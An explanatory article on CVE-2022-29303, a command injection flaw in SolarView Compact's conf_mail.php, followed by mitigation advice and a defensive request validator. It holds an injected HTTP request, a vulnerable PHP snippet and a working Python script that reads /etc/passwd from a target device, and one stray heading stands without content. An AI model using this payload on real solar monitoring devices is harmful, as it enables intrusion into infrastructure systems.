In April 2022, a significant vulnerability — CVE-2022-29303 — was publicly disclosed, affecting SolarView Compact version 6.00. This device, widely used to monitor solar power systems, was discovered to have a severe command injection vulnerability in its configuration interface. The flaw can allow attackers to execute arbitrary system commands directly on the device, potentially compromising entire solar energy networks.
This long read covers how the vulnerability works, offers practical exploit examples, and gives mitigation advice, all in plain, easy-to-understand language.
What Is SolarView Compact?
SolarView Compact is a web-based monitoring solution for solar installation management. End-users or administrators interact with the device primarily through its web browser interface. Ensuring the security of this device is crucial — a compromised device means attackers could manipulate or disrupt solar energy operations.
Details of the Vulnerability
Vulnerability Name: CVE-2022-29303
Affected Product: SolarView Compact ver.6.00
Component: conf_mail.php (Mail configuration script)
Type: Command Injection
What's Happening?
The web interface at /conf_mail.php lets authorized users adjust the device's email settings. The problem appears when user-supplied input isn't properly sanitized or checked before being passed to the operating system's shell. This means any command inserted into certain parameters gets run directly!
How the Attack Works
The vulnerability lies in how the backend code assembles and executes shell commands, especially when handling POST data sent through the configuration page.
Scenario:
An attacker, possibly after gaining access or through phishing/social engineering, accesses the /conf_mail.php endpoint and crafts a malicious request that injects system commands as part of the email settings.
A typical configuration submission might look like this (HTTP POST):
```http
POST /conf_mail.php HTTP/1.1
Host: [target_device_ip]
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=[session_id]

mail_server=smtp.example.com&mail_port=25&mail_user=user@example.com&mail_pass=secret
```
2. Exploiting the Vulnerability
Suppose the mail_server parameter is used unsafely in a shell command. An attacker can inject a command like this:
```http
POST /conf_mail.php HTTP/1.1
Host: [target_device_ip]
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=[session_id]

mail_server=smtp.example.com;id;&mail_port=25&mail_user=user@example.com&mail_pass=secret
```
Here, ;id; breaks out of the expected value and invokes the id command, which lists user info on Linux.
3. What Happens in the Backend
Although we don't have access to 100% of the source code, it's likely the code contains something like:
```php
<?php
// Pseudo vulnerable snippet
$mail_server = $_POST['mail_server'];
// BAD: directly inserting user input into a shell command
system("/usr/local/bin/configure_mail --server {$mail_server}");
?>
```
In this sample, if the attacker sends smtp.example.com;id; as the mail server, it becomes:
```
/usr/local/bin/configure_mail --server smtp.example.com;id;
```
So the shell runs the real config command, AND also runs id!
Let's automate the above attack using Python and the requests library:
```python
import requests

target = 'http://[target_device_ip]/conf_mail.php'
session_id = '[valid_session_id]'  # Assuming session is already authenticated
payload = "smtp.example.com;cat /etc/passwd;"  # Try reading passwd file
data = {
    'mail_server': payload,
    'mail_port': '25',
    'mail_user': 'attacker@example.com',
    'mail_pass': '123456'
}
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': 'PHPSESSID=' + session_id
}
response = requests.post(target, data=data, headers=headers)
print(response.text)
```
Note:
- You need an authenticated session unless the app allows unauthenticated access.
- The output of the command may show up in the server's web response, the user interface, or somewhere else (like emailed results).
Launch attacks on other networked devices
This vulnerability grants a critical level of access.
Mitigation & Recommendations
1. Upgrade: Always use the latest patched firmware. Check vendor advisories or contact support for updates.
2. Isolate Devices: Limit device network exposure — never expose management interfaces directly to the internet.
3. Strong Credentials: Use strong, unique passwords for all accounts.
4. Input Validation: Developers — always sanitize and validate external input before referencing it in system commands.
5. Monitor Logs: Watch device/system logs for suspicious activity.
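One way to put items 4 and 5 into practice, as an added example that is not part of the original article or the vendor's code: an allow-list validator for the mail settings, applied to captured POST requests to /conf_mail.php. The field names mail_server and mail_port come from the sample request above; valid_host, valid_port and audit_request are hypothetical helpers, and both requests are constructed samples.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# One DNS label: letters, digits, inner hyphens. Shell metacharacters cannot match.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(rf"{LABEL}(?:\.{LABEL})*")

def valid_host(value):
    """Allow-list check: an IP literal or a DNS host name, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and HOSTNAME.fullmatch(value) is not None

def valid_port(value):
    """Decimal TCP port in the range 1-65535."""
    return (len(value) <= 5 and value.isascii() and value.isdigit()
            and 1 <= int(value) <= 65535)

# Field names as shown in the article's sample request (assumed, not
# confirmed against the firmware).
VALIDATORS = {"mail_server": valid_host, "mail_port": valid_port}

def audit_request(raw):
    """Return the fields of a POST to /conf_mail.php that fail validation."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?")[0] != "/conf_mail.php":
        return []
    findings = []
    # Split on '&' only, then percent-decode, so an encoded ';' (%3B) is
    # checked in the form the backend would receive it.
    for pair in body.strip().split("&"):
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        check = VALIDATORS.get(name)
        if check and not check(value):
            findings.append(f"{name}={value!r}")
    return findings

# Constructed sample requests, modelled on the two requests shown earlier.
BENIGN = ("POST /conf_mail.php HTTP/1.1\r\nHost: device.example\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "mail_server=smtp.example.com&mail_port=25"
          "&mail_user=user%40example.com&mail_pass=secret")
INJECTED = BENIGN.replace("smtp.example.com", "smtp.example.com%3Bid%3B")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, audit_request(req))
```

The same allow-list belongs in the server-side handler before any command string is built; rejecting the value outright is safer than trying to strip characters from it.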
Final Thoughts
CVE-2022-29303 highlights how dangerous it can be when user input is carelessly handled in backend scripts on embedded devices. SolarView Compact version 6.00's misuse of shell inputs in conf_mail.php could let attackers take over the system, disrupt solar monitoring, and move deeper into critical infrastructure.
If you use SolarView products or similar hardware, double-check your device security today. Don’t wait for disaster to strike — patch, isolate, and harden!
> Stay safe, patch regularly, and always be wary of what goes behind the web interface!
Timeline
Published on: 05/12/2022 16:15:00 UTC
Last modified on: 05/20/2022 17:23:00 UTC